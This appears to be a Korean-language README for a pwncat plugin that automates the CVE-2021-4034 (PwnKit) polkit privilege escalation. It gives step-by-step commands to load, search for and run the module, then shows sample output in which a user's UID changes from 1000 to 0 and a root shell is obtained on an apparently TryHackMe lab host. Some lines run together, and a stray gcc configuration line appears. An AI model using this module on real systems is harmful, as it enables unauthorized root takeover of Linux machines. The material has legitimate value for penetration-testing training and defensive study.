
pwncat 모듈로 CVE-2021-4034(pwnkit)를 자동으로 익스플로잇합니다.
이 모듈의 목적은 pwncat 사용 시 대상에서 CVE-2021-4034(pwnkit)를 악용하는 것입니다.
디렉터리를 설정하거나 소스를 컴파일하거나 원격 대상에 gcc가 설치되어 있을 필요가 없습니다. pwnkit 모듈은 pwncat 프레임워크를 사용하여 이를 자동으로 처리합니다.
pwnkit.py를 pwncat-cs가 설치된 호스트의 아무 곳에나 복사하세요. 예: /home/user/pwncat_modsload /home/user/pwncat_modssearch pwnkit을 입력하세요. 다음과 같은 결과가 표시되어야 합니다:(local) pwncat$ search pwnkit
Results
╷
Name │ Description
══════════════════╪══════════════════════════════════════════════════════════════════════════════════════════════
pwnkit │ Exploit CVE-2021-4034 to privesc to root
run pwnkit을 입력하세요. 성공하면 UID가 0으로 변경되고 root가 됩니다. 예:(local) pwncat$ run pwnkit
[00:12:15] 10.10.184.131:47148: ran pwnkit. UID : Before(1000) | After(0) manager.py:955
Module pwnkit completed successfully run.py:100
(local) pwncat$
(remote) root@pwnkit:/# id
uid=0(root) gid=0(root) groups=0(root),1000(tryhackme)
load를 호출하고 싶지 않다면, 모듈을 ~/.local/share/pwncat/modules에 배치하여 pwncat이 시작 시 자동으로 로드하도록 할 수 있습니다.# Set the gcc path
set cross "/usr/bin/gcc"
개발자 관점에서 pwncat 프레임워크를 배우는 동안 도움을 준 Caleb Stewart에게 특별한 감사를 전합니다. 시간이 생기면 언젠가 이 모듈을 메인 pwncat escalate 모듈에 포함시키는 풀 리퀘스트를 보내겠습니다... 약속합니다. :-)